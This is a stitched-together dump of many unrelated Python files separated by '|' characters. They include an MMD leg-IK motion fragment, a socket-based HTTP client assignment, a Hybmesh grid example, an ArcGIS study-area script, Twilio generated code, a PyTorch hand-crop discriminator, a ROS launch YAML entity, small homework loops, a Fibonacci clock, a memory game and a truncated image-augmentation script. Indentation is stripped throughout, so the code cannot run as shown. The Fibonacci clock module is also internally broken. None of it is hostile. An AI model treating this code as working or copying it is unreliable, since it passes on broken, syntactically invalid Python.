bf.position = prev_bf.position.copy()
motion.regist_bf(bf, leg_ik_bone_name, fno)
for fno in range(prev_fno, next_fno + 1):
# つま先IKのグローバル位置を再計算
toe_ik_3ds = MServiceUtils.calc_global_pos(model, toe_ik_links, motion, fno)
toe_ik_global_pos = toe_ik_3ds[toe_ik_bone_name]
if toe_ik_global_pos.y() < 0:
# 足IKの行列を再計算
sole_ik_3ds, sole_mats = MServiceUtils.calc_global_pos(model, ik_links, motion, fno, return_matrix=True)
toe_ik_local_prev_pos = sole_mats[leg_ik_bone_name].inverted() * toe_ik_global_pos
toe_ik_local_now_pos = sole_mats[leg_ik_bone_name].inverted() * MVector3D(toe_ik_global_pos.x(), model.bones[toe_ik_bone_name].position.y(), toe_ik_global_pos.z())
adjust_toe_qq = MQuaternion.rotationTo(toe_ik_local_prev_pos, toe_ik_local_now_pos)
logger.debug("%sつま先ゼロ(%s-%s): toe_ik_global_pos: %s, adjust_toe_qq: %s", direction, prev_fno, next_fno, toe_ik_global_pos.to_log(),
adjust_toe_qq.toEulerAngles4MMD().to_log())
prev_bf = motion.calc_bf(leg_ik_bone_name, prev_fno)
bf = motion.calc_bf(leg_ik_bone_name, fno)
bf.rotation *= adjust_toe_qq
if fno > prev_fno and MQuaternion.dotProduct(prev_bf.rotation, bf.rotation) > 0.95:
logger.debug("%sつま先回転コピー(%s-%s): toe_ik_global_pos: %s, prev: %s, now: %s", direction, prev_fno, next_fno, toe_ik_global_pos.to_log(),
prev_bf.rotation.toEulerAngles4MMD().to_log(), bf.rotation.toEulerAngles4MMD().to_log())
bf.rotation = prev_bf.rotation.copy()
motion.regist_bf(bf, leg_ik_bone_name, fno)
elif np.max(toe_distances) <= self.options.leg_error_tolerance and prev_sole_pos.y() < 0.5 + model.bones[leg_ik_bone_name].position.y():
logger.debug("%sつま先固定(%s-%s): sole: %s", direction, prev_fno, next_fno, toe_distances)
# つま先位置がブレの許容範囲内である場合、つま先を固定する位置に足IKを置く
prev_bf = motion.calc_bf(leg_ik_bone_name, prev_fno)
for fidx, fno in enumerate(range(prev_fno + 1, next_fno + 1)):
# つま先のグローバル位置
toe_pos = MVector3D(toe_poses[fidx])
bf = motion.calc_bf(leg_ik_bone_name, fno)
bf.position = prev_bf.position.copy() - (toe_pos - prev_toe_pos)
motion.regist_bf(bf, leg_ik_bone_name, fno)
else:
logger.debug("×%s固定なし(%s-%s): prev: %s, sole: %s, toe: %s", direction, prev_fno, next_fno, prev_sole_pos.to_log(), sole_distances, toe_distances)
if prev_fno // 500 > prev_sep_fno:
logger.count(f"【{direction}足IKブレ固定】", prev_fno, fnos)
prev_sep_fno = prev_fno // 500
# IKon
for showik in self.options.motion.showiks:
for ikf in showik.ik:
if ikf.name == leg_ik_bone_name or ikf.name == toe_ik_bone_name:
ikf.onoff = 1
# 不要キー削除処理
if self.options.remove_unnecessary_flg:
self.options.motion.remove_unnecessary_bf(0, leg_ik_bone_name, self.options.model.bones[leg_ik_bone_name].getRotatable(), \
self.options.model.bones[leg_ik_bone_name].getTranslatable())
return True
|
# Http client
# Jason Hurtado
# UCID: jh465
# Section: 003
from datetime import datetime, timezone
import sys, re, time
from socket import*
#socketAPI.pdf
# localhost:12000/filename.html
argv = sys.argv
url = argv[1] #web url containing hostname and port where server is running
# and name of the file to be downloaded
splitURL = url.split("/") #https://www.geeksforgeeks.org/python-string-split/
fileName = splitURL[1]
hostName = splitURL[0]
temp = hostName.split(":")
port = int(temp[1])
host = temp[0]
#conditional GET requests
#time.sleep(15) #https://stackoverflow.com/questions/510348/how-can-i-make-a-time-delay-in-python
try:
cachedfile = open("cache.txt", "r")
contents = cachedfile.read()
cachedfile.close()
lastmod = open("lastmod.txt", "r")
last_mod_time = lastmod.read()
lastmod.close()
sendData = "GET /"+fileName+ " HTTP/1.1\r\n"
#print(sendData)
sendData += "Host: "+hostName+ "\r\n"
sendData += "If-Modified-Since: "+last_mod_time+"\r\n"
sendData += "\r\n"
print("Conditional GET request: "+sendData)
clientSocket2 = socket(AF_INET, SOCK_STREAM)
clientSocket2.connect((host,port))
clientSocket2.send(sendData.encode())
serverResponse2 = clientSocket2.recv(4096)
serverContents2 = serverResponse2.decode()
#if server indicates that the file hasnt been modified since last downloaded
#print contents saying so
if "304 Not Modified" in serverContents2:
print(serverContents2+"\n")
clientSocket2.close()
#else print and cache new contents
else:
splitServerContents2 = serverContents2.split("\r\n")
#print(splitServerContents2[0])
#print(splitServerContents2[1])
lengthTwo = len(splitServerContents2)
fileContents2 = splitServerContents2[lengthTwo-1]
print(serverContents2+"\n")
#print(fileContents+"\n")
if "404 Not Found" in serverContents2:
exit()
else:
temp = serverContents2.split("Last-Modified: ")
temp2 = temp[1].split("\r\n")
last_mod_time = temp2[0]
lastmod = open("lastmod.txt", "w")
lastmod.write(last_mod_time)
lastmod.close()
#cache the file in cache.txt
cacheFile2 = open("cache.txt", "w")
cacheFile2.write(fileContents2)
cacheFile2.close()
clientSocket2.close()
except FileNotFoundError:
sendData = "GET /"+fileName+ " HTTP/1.1\r\n"
sendData += "Host: "+hostName+ "\r\n"
sendData += "\r\n"
clientSocket = socket(AF_INET, SOCK_STREAM)
#print("Connecting to "+host+","+str(port))
clientSocket.connect((host,port))
print("Sending data to server: " +sendData)
clientSocket.send(sendData.encode())
serverResponse = clientSocket.recv(4096) #https://docs.python.org/3.4/howto/sockets.html
serverContents = serverResponse.decode()
#split it into serverContents and fileContents seperately
if "404 Not Found" in serverContents:
print(serverContents+"\n") #should be header contents
else:
splitServerContents = serverContents.split("\r\n")
lengthOne = len(splitServerContents) #https://stackoverflow.com/questions/22101086/split-and-count-a-python-string
#print(len)
fileContents = splitServerContents[lengthOne-1]
print(serverContents+"\n")
#print(fileContents+"\n")
#cache the file in cache.txt
cacheFile = open("cache.txt", "w")
cacheFile.write(fileContents)
cacheFile.close()
clientSocket.close()
temp = serverContents.split("Last-Modified: ")
temp2 = temp[1].split("\r\n")
last_mod_time = temp2[0]
lastmod = open("lastmod.txt", "w")
lastmod.write(last_mod_time)
lastmod.close()
|
# ===== <code_preproc remove vvv>
import sys
# This line was added to find Hybmesh.py that is not located
# in the current directory or package subdirectory.
# Normally this should be omitted.
sys.path.append("../../../../build/bindings/py")
# ===== <code_preproc remove ^^^>
import math
from Hybmesh import Hybmesh
# target function: Gaussian hill with the center at [0, 0]
def expfun(x, y):
return math.exp(-(x*x + y*y)/(0.25))
# ===== <code_preproc remove vvv>
# set paths
Hybmesh.hybmesh_exec_path = "../../../../src/py/"
Hybmesh.hybmesh_lib_path = "../../../../build/bin/"
# ===== <code_preproc remove ^^^>
# create Hybmesh connection under with block to guarantee
# its destruction after all
with Hybmesh() as hm:
# loop over different outer step sizes
for h in [0.2, 0.1, 0.05]:
# create rectangle-in-cirlce grid prototype
g = hm.add_circ_rect_grid([0, 0], 1.0, h)
# get vertices as plain 1D array
vertices = g.raw_vertices()
# get cell-vertices table as plain array.
# Here we already know that grid contains only quadrangular cells,
# hence there is no need to call g.raw_tab("cell_dim") to know
# how the plain cell_vert array should be subdivided.
cell_vert = g.raw_tab("cell_vert")
# calculating integral as the sum of cell areas multiplied by
# cell center function values.
result = 0
it = iter(cell_vert)
for ind in zip(it, it, it, it):
# ind contains four vertex indices for current cell
# x, y - are respective x and y coordinates
x = list(map(lambda i: vertices[2*i], ind))
y = list(map(lambda i: vertices[2*i+1], ind))
# calculate function value at approximate cell center
f = expfun(sum(x)/4.0, sum(y)/4.0)
# calculate area
x1, x2, x3 = x[1] - x[0], x[2] - x[0], x[3] - x[0]
y1, y2, y3 = y[1] - y[0], y[2] - y[0], y[3] - y[0]
area = 0.5*(x1*y2-y1*x2 + x2*y3-y2*x3)
result += f * area
print("h = {}: integral = {}".format(h, result))
|
##########################
## Designed to work in Arcgis 10.1
## Creates Study Area polygons for all shapefiles within a chosen directory.
## Outputs Study Area features into a subfolder named "StudyAreas".
## Names shapefiles correctly.
## Collects GUI from original habitat map name and transfers across.
## Creates "SUM_CONF" field for values to be entered manually.
##
## Warning: The habitat maps contained within the supplied folder MUST be in a MESH DEF for this script to work.
## Created by: Graeme Duncan, JNCC for EMODnet Seabed Habitats 2014.
## Modified by: Sabrina Agnesi, ISPRA for EMODnet Seabed Habitats 2020.
## Contact: info@emodnet-seabedhabitats.eu
###########################
import arcpy
from arcpy import env
import os
env.overwriteOutput = True
print "Please ensure that all habitat maps are named correctly and in a MESH Data Exchange Format"
print ""
root_workspace = raw_input('Paste the full directory path to the folder containing your MESH formatted maps here and press enter: ')
arcpy.env.workspace = root_workspace
featureList = arcpy.ListFeatureClasses()
outdir = os.path.join(root_workspace, "StudyAreas")
if not os.path.isdir(outdir):
try:
os.makedirs(outdir)
except OSError:
raise
for fc in featureList:
print "Creating StudyArea for %s..." % fc
fcName, fcExt = os.path.splitext(str(fc))
fcGUI = fcName[:8]
print fcGUI
outfc = outdir + "\\" + fcGUI + "_StudyArea" + fcExt
desc = arcpy.Describe(fc)
spatref = desc.spatialReference
extent = desc.extent
pts = [arcpy.Point(extent.XMin, extent.YMin),
arcpy.Point(extent.XMax, extent.YMin),
arcpy.Point(extent.XMax, extent.YMax),
arcpy.Point(extent.XMin, extent.YMax)]
array = arcpy.Array(items=pts)
poly = arcpy.Polygon(array, spatref)
try:
arcpy.CopyFeatures_management(poly, outfc)
except Exception as e:
print "Error creating StudyArea shapefile for %s" % fc
print e.message
else:
print "Successfully created StudyArea shapefile for %s" % fc
print outfc
print "Creating DEF fields..."
arcpy.AddField_management(outfc, "GUI", "TEXT", "", "",8)
arcpy.AddField_management(outfc, "UUID", "TEXT", "","",36)
arcpy.AddField_management(outfc, "AVAILABLE", "TEXT","","",13)
arcpy.CalculateField_management(outfc, "GUI", '"' + fcGUI + '"', "PYTHON")
arcpy.DeleteField_management(outfc,"Id")
print "_______________________"
print "************"
print "* COMPLETE *"
print "************"
|
i=1
l=[]
while i != 0:
i=int(input("Enter a value (0 to end): "))
print(i)
l.append(i)
l.remove(0)
print("Min:",min(l))
print("Max:",max(l))
print("Avg: {:.1f}".format(sum(l)/len(l))) |
# coding=utf-8
"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base.domain import Domain
from twilio.rest.preview.marketplace import Marketplace
from twilio.rest.preview.sync import Sync
from twilio.rest.preview.wireless import Wireless
class Preview(Domain):
def __init__(self, twilio):
"""
Initialize the Preview Domain
:returns: Domain for Preview
:rtype: twilio.rest.preview.Preview
"""
super(Preview, self).__init__(twilio)
self.base_url = 'https://preview.twilio.com'
# Versions
self._sync = None
self._wireless = None
self._marketplace = None
@property
def sync(self):
"""
:returns: Version sync of preview
:rtype: twilio.rest.preview.sync.Sync
"""
if self._sync is None:
self._sync = Sync(self)
return self._sync
@property
def wireless(self):
"""
:returns: Version wireless of preview
:rtype: twilio.rest.preview.wireless.Wireless
"""
if self._wireless is None:
self._wireless = Wireless(self)
return self._wireless
@property
def marketplace(self):
"""
:returns: Version marketplace of preview
:rtype: twilio.rest.preview.marketplace.Marketplace
"""
if self._marketplace is None:
self._marketplace = Marketplace(self)
return self._marketplace
@property
def services(self):
"""
:rtype: twilio.rest.preview.sync.service.ServiceList
"""
return self.sync.services
@property
def commands(self):
"""
:rtype: twilio.rest.preview.wireless.command.CommandList
"""
return self.wireless.commands
@property
def rate_plans(self):
"""
:rtype: twilio.rest.preview.wireless.rate_plan.RatePlanList
"""
return self.wireless.rate_plans
@property
def sims(self):
"""
:rtype: twilio.rest.preview.wireless.sim.SimList
"""
return self.wireless.sims
@property
def available_add_ons(self):
"""
:rtype: twilio.rest.preview.marketplace.available_add_on.AvailableAddOnList
"""
return self.marketplace.available_add_ons
@property
def installed_add_ons(self):
"""
:rtype: twilio.rest.preview.marketplace.installed_add_on.InstalledAddOnList
"""
return self.marketplace.installed_add_ons
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Preview>'
|
import math
s = float(input('Довжина сторони '))
n = float(input('Кількість сторін '))
S = (n*s**2)/(4*math.tan(math.pi/n))
print(S)
import datetime
def printTimeStamp(name):
print('Автор програми:' + name)
print('Час компіляції: ' + str(datetime.datetime.now()))
printTimeStamp('Nehodenko and Neskoromny Yaroslav')
|
import torch
import numpy as np
from pathlib import Path
from tqdm import tqdm
from mpl_toolkits.mplot3d import Axes3D
from src import ROOT
from src.models.base_model import Base_Model
from src.datasets import get_dataloader, get_dataset
from src.models.hand_crop_disc.hand_crop_disc_net import DCGAN_Discriminator
from src.optimizers import get_optimizer
from src.schedulers import get_scheduler
from src.utils import *
from src.datasets.transforms import *
class Hand_Crop_Disc_Model(Base_Model):
def __init__(self, cfg):
super().__init__(cfg)
if cfg['net'] == 'dcgan':
self.net = DCGAN_Discriminator(cfg).cuda()
self.optimizer = get_optimizer(cfg, self.net)
self.scheduler = get_scheduler(cfg, self.optimizer)
self.train_dataloader = get_dataloader(cfg, get_dataset(cfg, 'train'))
self.val_dataloader = get_dataloader(cfg, get_dataset(cfg, 'val'))
self.pretrain = cfg['pretrain']
self.load_weights()
self.img_rsz = int(cfg['img_rsz'])
if cfg['loss'] == 'bce':
self.loss = torch.nn.BCELoss()
elif cfg['loss'] == 'mse':
self.loss = torch.nn.MSELoss()
self.val_loss = []
# ========================================================
# TRAINING
# ========================================================
def train_step(self, data_load):
img, is_hand = data_load
img = img.cuda()
is_hand = is_hand.type(torch.FloatTensor).cuda()
out = self.net(img)
loss = self.loss(out, is_hand)
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
loss_dict = {
'loss' : '{:04f}'.format(loss.item()),
}
return loss_dict
# ========================================================
# VALIDATION
# ========================================================
def valid_step(self, data_load):
img, is_hand = data_load
img = img.cuda()
is_hand = is_hand.type(torch.FloatTensor).cuda()
out = self.net(img)
loss = self.loss(out, is_hand)
self.val_loss.append(loss.item())
def get_valid_loss(self):
val_loss = np.mean(self.val_loss)
val_loss_dict = {
'val_loss' : val_loss,
}
self.val_loss = []
return val_loss_dict
# ========================================================
# PREDICTION
# ========================================================
def predict_step(self, data_load):
img = data_load[0]
img = img.cuda()
pred_hand = self.net(img)
batch_size = img.shape[0]
W = pred_hand.shape[3]
H = pred_hand.shape[2]
D = self.D
pred_hand = pred_hand.view(batch_size, self.num_joints*3+1, D, H, W)
pred_hand = pred_hand.permute(0, 1, 3, 4, 2)
for batch in range(batch_size):
# Hand
cur_pred_hand = pred_hand[batch]
pred_uvd = cur_pred_hand[:self.num_joints*3, :, :, :].view(self.num_joints, 3, H, W, D)
pred_conf = torch.sigmoid(cur_pred_hand[self.num_joints*3, :, :, :])
FT = torch.FloatTensor
yv, xv, zv = torch.meshgrid([torch.arange(H),
torch.arange(W),
torch.arange(D)])
grid_x = xv.repeat((self.num_joints, 1, 1, 1)).type(FT).cuda()
grid_y = yv.repeat((self.num_joints, 1, 1, 1)).type(FT).cuda()
grid_z = zv.repeat((self.num_joints, 1, 1, 1)).type(FT).cuda()
pred_uvd[self.hand_root, :, :, :, :] = \
torch.sigmoid(pred_uvd[self.hand_root, :, :, :, :])
pred_uvd[:, 0, :, :, :] = (pred_uvd[:, 0, :, :, :] + grid_x)/W
pred_uvd[:, 1, :, :, :] = (pred_uvd[:, 1, :, :, :] + grid_y)/H
pred_uvd[:, 2, :, :, :] = (pred_uvd[:, 2, :, :, :] + grid_z)/D
pred_uvd = pred_uvd.contiguous().view(self.num_joints, 3, -1)
pred_conf = pred_conf.contiguous().view(-1)
top10_pred_uvd = []
top10_idx = torch.topk(pred_conf, 10)[1]
for idx in top10_idx:
top10_pred_uvd.append(pred_uvd[:, :, idx].cpu().numpy())
self.best_pred_uvd_list.append(top10_pred_uvd[0])
self.top10_pred_uvd_list.append(top10_pred_uvd)
self.pred_conf_list.append(pred_conf.cpu().numpy())
def save_predictions(self, data_split):
pred_save = "predict_{}_{}_best.txt".format(self.load_epoch,
data_split)
pred_file = self.exp_dir/pred_save
np.savetxt(pred_file, np.reshape(self.best_pred_uvd_list, (-1, self.num_joints*3)))
pred_save = "predict_{}_{}_top10.txt".format(self.load_epoch,
data_split)
pred_file = self.exp_dir/pred_save
np.savetxt(pred_file, np.reshape(self.top10_pred_uvd_list, (-1, self.num_joints*3*10)))
pred_save = "predict_{}_{}_conf.txt".format(self.load_epoch,
data_split)
pred_file = self.exp_dir/pred_save
np.savetxt(pred_file, self.pred_conf_list)
self.pred_list = []
self.best_pred_uvd_list = []
self.top10_pred_uvd_list = []
self.pred_conf_list = []
# ========================================================
# DETECT
# ========================================================
def detect(self, img, bbox):
import matplotlib.pyplot as plt
import torchvision
if bbox is not None:
img_crop = get_img_crop_from_bbox(img, bbox)
tfrm = []
tfrm.append(ImgResize((self.img_rsz)))
tfrm.append(ImgToTorch())
transform = torchvision.transforms.Compose(tfrm)
sample = {'img': img_crop}
sample = transform(sample)
img_crop = sample['img']
img_crop = img_crop.unsqueeze(0).cuda()
else:
img_crop = img.cuda()
out = self.net(img_crop)
img_crop = ImgToNumpy()(img_crop.cpu())[0]
fig, ax = plt.subplots()
plt.axis('off')
ax.imshow(img_crop)
plt.show()
print(out.item())
def detect_out(self, img, bbox):
import matplotlib.pyplot as plt
import torchvision
if bbox is not None:
img_crop = get_img_crop_from_bbox(img, bbox)
tfrm = []
tfrm.append(ImgResize((self.img_rsz)))
tfrm.append(ImgToTorch())
transform = torchvision.transforms.Compose(tfrm)
sample = {'img': img_crop}
sample = transform(sample)
img_crop = sample['img']
img_crop = img_crop.unsqueeze(0).cuda()
else:
img_crop = img.cuda()
out = self.net(img_crop)
img_crop = ImgToNumpy()(img_crop.cpu())[0]
return img_crop, out.item() |
# Copyright 2019 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module for YAML Entity class."""
from typing import List
from typing import Optional
from typing import Text
from typing import Union
from launch.frontend import Entity as BaseEntity
from launch.frontend.type_utils import check_is_list_entity
from launch.utilities.type_utils import AllowedTypesType
from launch.utilities.type_utils import AllowedValueType
from launch.utilities.type_utils import is_instance_of
class Entity(BaseEntity):
"""Single item in the intermediate YAML front_end representation."""
def __init__(
self,
element: dict,
type_name: Text = None,
*,
parent: 'Entity' = None
) -> Text:
"""Create an Entity."""
self.__type_name = type_name
self.__element = element
self.__parent = parent
self.__read_keys = set()
self.__children_called = False
@property
def type_name(self) -> Text:
"""Get Entity type."""
return self.__type_name
@property
def parent(self) -> Optional['Entity']:
"""Get Entity parent."""
return self.__parent
@property
def children(self) -> List['Entity']:
"""Get the Entity's children."""
self.__children_called = True
if not isinstance(self.__element, (dict, list)):
raise TypeError(
f'Expected a dict or list, got {type(self.element)}:'
f'\n---\n{self.__element}\n---'
)
if isinstance(self.__element, dict):
if 'children' not in self.__element:
raise ValueError(
f'Expected entity `{self.__type_name}` to have children entities.'
f'That can be a list of subentities or a dictionary with a `children` '
'list element')
self.__read_keys.add('children')
children = self.__element['children']
else:
children = self.__element
entities = []
for child in children:
if len(child) != 1:
raise RuntimeError(
'Subentities must be a dictionary with only one key'
', which is the entity type')
type_name = list(child.keys())[0]
entities.append(Entity(child[type_name], type_name))
return entities
def assert_entity_completely_parsed(self):
if isinstance(self.__element, list):
if not self.__children_called:
raise ValueError(
f'Unexpected nested entity(ies) found in `{self.__type_name}`: '
f'{self.__element}')
return
unparsed_keys = set(self.__element.keys()) - self.__read_keys
if unparsed_keys:
raise ValueError(
f'Unexpected key(s) found in `{self.__type_name}`: {unparsed_keys}'
)
def get_attr(
self,
name: Text,
*,
data_type: AllowedTypesType = str,
optional: bool = False,
can_be_str: bool = True,
) -> Optional[Union[
AllowedValueType,
List['Entity'],
]]:
"""
Access an attribute of the entity.
See :py:meth:`launch.frontend.Entity.get_attr`.
`launch_yaml` does not apply type coercion,
it only checks if the read value is of the correct type.
"""
if name not in self.__element:
if not optional:
raise AttributeError(
"Can not find attribute '{}' in Entity '{}'".format(
name, self.type_name))
else:
return None
self.__read_keys.add(name)
data = self.__element[name]
if check_is_list_entity(data_type):
if isinstance(data, list) and isinstance(data[0], dict):
return [Entity(child, name) for child in data]
raise TypeError(
"Attribute '{}' of Entity '{}' expected to be a list of dictionaries.".format(
name, self.type_name
)
)
if not is_instance_of(data, data_type, can_be_str=can_be_str):
raise TypeError(
"Attribute '{}' of Entity '{}' expected to be of type '{}', got '{}'".format(
name, self.type_name, data_type, type(data)
)
)
return data
|
#Part 1
for count in range(1, 1001, 2):
print count
#Part 2
for count in range(5, 1000001, 5):
print count
#Sum List
a = [1, 2, 5, 10, 255, 3]
sum = 0
for i in a:
sum+=i
print sum
#Average List
print sum/len(a) |
import json
with open('italy_geo.json') as f:
data = json.load(f)
for x in data:
if x[u'comune'] == u'Imola':
lat = float(x[u'lat'])
lon = float(x[u'lng'])
print(lat,lon)
break
else:
x = None |
"""
TODO
"""
from typing import Iterator
from datetime import datetime
from math import frexp
from random import choice as random_choice
def init_fib_clock(fib_clock):
fib_clock._previous_fifth_minute = -1
fib_clock._COLOR_MIN = '98e8fa' # Light blue.
fib_clock._COLOR_HOUR = 'faaa98' # Lightish red.
fib_clock._COLOR_BOTH = 'b7fa98' # Light green.
fib_clock._COLOR_NEITHER = 'dddddd' # Light grey.
fib_clock._color_codes = (
(0b00000,),
(0b10000, 0b01000),
(0b11000, 0b00100),
(0b10100, 0b01100, 0b00010),
(0b10010, 0b01010, 0b11100),
(0b11010, 0b00110, 0b00001),
(0b10110, 0b01110, 0b10001, 0b01001),
(0b11110, 0b11001, 0b00101),
(0b10101, 0b01101, 0b00011),
(0b10011, 0b01011, 0b11101),
(0b11011, 0b00111),
(0b10111, 0b01111),
(0b11111,),
)
fib_clock._colors = [fib_clock._COLOR_NEITHER]*5
fib_clock.color_map = {
0: fib_clock._colors[0],
1: fib_clock._colors[0],
2: fib_clock._colors[1],
3: fib_clock._colors[1],
4: fib_clock._colors[2],
5: fib_clock._colors[2],
6: fib_clock._colors[3],
7: fib_clock._colors[3],
8: fib_clock._colors[4],
9: fib_clock._colors[4],
}
def update_fib_clock(fib_clock):
now = datetime.now()
fifth_minute = now.minute // 5
if fib_clock._previous_fifth_minute != fifth_minute:
hour = now.hour
if hour == 24:
hour = 0
elif hour > 12:
hour -= 12
color_codes = fib_clock._color_codes
minute_codes = random_choice(color_codes[fifth_minute])
hour_codes = random_choice(color_codes[hour])
for minute, hour in zip([minute_codes, hour_codes]):
if minute and hour:
fib_clock.panel_colors = fib_clock._COLOR_BOTH
elif minute:
fib_clock.panel_colors = fib_clock._COLOR_MIN
elif hour:
fib_clock.panel_colors = fib_clock._COLOR_HOUR
else:
fib_clock.panel_colors = fib_clock._COLOR_NEITHER
fib_clock._previous_fifth_minute = fifth_minute
def fibs(count, current=0, later=1):
for _ in range(count):
yield current
current, later = later, current + later
def options(iterable, result):
parts = sorted(iterable, reverse=True)
for part in parts:
if result >= part:
yield True
result -= part
else:
yield False
def code(value, iterable):
sum_ = sum(iterable)
if value > sum_:
raise ValueError(f'value {value} is too high')
if value == sum_:
yield
return
def options(iterable) -> Iterator[tuple]:
iterable = tuple(iterable)
for i in range(sum(iterable) + 1):
yield tuple(code(i, iterable))
def fib_options(limit):
fibos = tuple(fibs(limit, 1, 1))
for i in range(sum(fibos) + 1):
yield tuple(options(fibos, i))
if __name__ == '__main__':
print(list(options(fibs(5, 1))))
|
import random, time, sys, os, winsound
stream = sys.stdout
level = int
answer = ""
round = 0
turn = ""
def clear():
os.system('cls' if os.name == 'nt' else 'clear')
frequency = 1500 # Set Frequency To 2500 Hertz
duration = 100 # Set Duration To 1000 ms == 1 second
def beep(duration=100):
winsound.Beep(frequency, duration)
clear()
level = int(input("Selecione o número de fases >> "))
clear()
dif = int(input("Selecione a dificuldade [ 1 - FÁCIL ] // [ 2 - MÉDIO ] // [ 3 - DIFÍCIL ] // >> "))
if dif == 1:
dif = 2
elif dif == 2:
dif = 1
elif dif == 3:
dif = .500
clear()
print("Começando em 3...")
beep()
time.sleep(1)
clear()
print("Começando em 3...2...")
beep()
time.sleep(1)
clear()
print("Começando em 3...2...1...")
beep()
time.sleep(1)
clear()
print("Começando em 3...2...1... JÁ!!")
beep(500)
time.sleep(1)
clear()
game = True
resultList = [] # Imprimir resultado por round
while round < level:
answer = ""
n = random.randint(0,9)
n2 = str(n)
resultList.append(n2) # Inclui o valor n2 dentro de uma lista
for x in range(len(resultList)):
print("[[ " + resultList[x] + " ]]")
beep()
time.sleep(dif)
clear()
clear()
answer = input(" >> >> >> ")
turn += n2
#print ("Gabarito: ", turn)
#print("Input: ", ans)
if answer == turn:
round += 1
clear()
else:
print("GAME OVER!!","Gabarito: {}".format(turn),"Input: {}".format(answer), sep='\n')
quit()
print("PARABÉNS!!!","Gabarito: {}".format(turn),"Input: {}".format(answer), sep='\n')
for i in range(10):
beep(80) |
import datetime
import os
from PIL import Image, ImageDraw
import numpy
import scipy.misc
import glob
import scipy
import random
import argparse
import cv2
import tensorflow as tf
from tensorflow.keras.callbacks import TensorBoard
HEIGHT = 160
WIDTH = 160
NUM_CHANNELS = 3
NUM_CLASSES = 2
MODEL_FILE_NAME = "{}_model.h5".format(os.path.splitext(os.path.basename(__file__))[0])
DEBUG_DIR = "__debug__"
def augmentation(img, paramR, paramL):
height, width, num_channels = img.shape
# crop
#shift_h = int(width * 0.1)
#shift_v = int(height * 0.1)
shift_h = 4
shift_v = 4
offset_x = int(random.uniform(0, shift_h * 2))
offset_y = int(random.uniform(0, shift_v * 2))
img = tf.image.resize_with_crop_or_pad(img, height + shift_v * 2, width + shift_h * 2)
img = img[offset_y:offset_y+height, offset_x:offset_x+width,:]
paramR = (paramR * width + shift_h - offset_x) / width
paramL = (paramL * width + shift_h - offset_x) / width
paramR = numpy.clip(paramR, a_min = 0, a_max = 1)
paramL = numpy.clip(paramL, a_min = 0, a_max = 1)
# rotate
angle = random.uniform(-0.1, 0.1)
img = scipy.ndimage.rotate(img, angle , axes=(1, 0), reshape=False, order=3, mode='constant', cval=0.0, prefilter=True)
return img, paramR, paramL
def standardize_img(img):
mean = numpy.mean(img, axis=None, keepdims=True)
std = numpy.sqrt(((img - mean)**2).mean(axis=None, keepdims=True))
return (img - mean) / std
def load_img(file_path):
img = Image.open(file_path)
img.load()
img = numpy.asarray(img, dtype="int32")
# Convert image to grayscale
r, g, b = img[:,:,0], img[:,:,1], img[:,:,2]
gray = 0.2989 * r + 0.5870 * g + 0.1140 * b
img[:,:,0] = gray
img[:,:,1] = gray
img[:,:,2] = gray
img = img.astype("float")
return img
def load_imgs(path_list, ground_params, floor_params, use_augmentation = False, augmentation_factor = 1, use_shuffle = False, debug = False):
# Calculate number of images
if use_augmentation:
num_images = len(path_list) * augmentation_factor
else:
num_images = len(path_list)
X = numpy.zeros((num_images, WIDTH, HEIGHT, 3), dtype=float)
Y = numpy.zeros((num_images, 2), dtype=float)
# Load images
i = 0
for file_path in path_list:
file_name = os.path.basename(file_path)
orig_img = load_img(file_path)
orig_height, orig_width, channels = orig_img.shape
# Crop above shop
floors = sorted(floor_params[file_name])
shop = int(floors[len(floors) - 1] * orig_height)
orig_img = orig_img[shop:orig_height,:,:]
orig_height, orig_width, channels = orig_img.shape
img = cv2.resize(orig_img, dsize=(WIDTH, HEIGHT), interpolation=cv2.INTER_CUBIC)
values = sorted(ground_params[file_name], reverse = True)
width = orig_width
#Previous loop location
valueR = values[0]
valueL = values[1]
actual_valueR = valueR * orig_width / width
actual_valueL = valueL * orig_width / width
if use_augmentation:
for j in range(augmentation_factor):
img_tmp, adjusted_valueR, adjusted_valueL = augmentation(img, actual_valueR, actual_valueL)
if debug:
output_filename = "{}/{}.png".format(DEBUG_DIR, i)
print(output_filename)
output_img(img_tmp, adjusted_valueR, adjusted_valueL, output_filename)
X[i,:,:,:] = standardize_img(img_tmp)
Y[i, 0] = adjusted_valueR
Y[i, 1] = adjusted_valueL
i += 1
else:
if debug:
output_filename = "{}/{}.png".format(DEBUG_DIR, i)
print(output_filename)
output_img(img, actual_valueR, actual_valueL, output_filename)
X[i,:,:,:] = standardize_img(img)
Y[i, 0] = actual_valueR
Y[i, 1] = actual_valueL
i += 1
if use_shuffle:
randomize = numpy.arange(len(X))
numpy.random.shuffle(randomize)
X = X[randomize]
Y = Y[randomize]
return X, Y
def output_img(img, valueR, valueL, filename):
img = Image.fromarray(img.astype(numpy.uint8))
width, height = img.size
imgdraw = ImageDraw.Draw(img)
imgdraw.line([(width * valueR, 0), (width * valueR, height)], fill = "yellow", width = 3)
imgdraw.line([(width * valueL, 0), (width * valueL, height)], fill = "yellow", width = 3)
img.save(filename)
def output_img2(img, values, filename):
width, height = img.size
imgdraw = ImageDraw.Draw(img)
for a in range(0, len(values), 2):
valueR = values[a]
valueL = values[a + 1]
imgdraw.line([(width * valueR, 0), (width * valueR, height)], fill = "yellow", width = 3)
imgdraw.line([(width * valueL, 0), (width * valueL, height)], fill = "yellow", width = 3)
img.save(filename)
def load_annotation(file_path):
ground_params = {}
file = open(file_path, "r")
while True:
filename = file.readline().strip()
if len(filename) == 0: break
columns = file.readline().strip()
ground_columns = file.readline().strip()
values = []
data = ground_columns.split(',')
if len(data) > 0:
for i in range(len(data)):
values.append(float(data[i].strip()))
ground_params[filename] = values
return ground_params
def load_annotation_floor(file_path):
floor_params = {}
file = open(file_path, "r")
while True:
filename = file.readline().strip()
if len(filename) == 0: break
floors = file.readline().strip()
values = []
